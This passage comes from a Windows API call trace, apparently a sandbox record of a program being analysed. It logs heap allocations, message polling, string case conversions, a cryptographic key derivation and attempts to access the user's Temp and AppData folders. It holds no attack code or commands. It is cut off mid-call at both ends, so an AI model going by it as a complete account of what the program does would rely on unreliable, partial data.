lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0250.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0250.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0250.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0250.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0250.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0250.021] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0250.022] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0250.022] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0250.022] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0250.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0250.023] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0250.023] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.023] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0250.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0250.023] CryptDeriveKey (in: hProv=0xad2720, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0250.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0250.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0250.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0250.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0250.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0250.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0250.025] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0250.025] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0250.026] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0250.026] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0250.026] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0250.026] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0250.026] CryptDestroyHash (hHash=0xaa5920) returned 1 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0250.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0250.026] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0250.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0250.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.027] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.027] GetLastError () returned 0x5 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0250.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0250.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0250.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0250.028] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0250.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0250.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0250.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x2416270 [0250.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0250.030] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0250.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0250.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0250.030] RtlAllocateHeap (HeapHandle=0x25c0000, 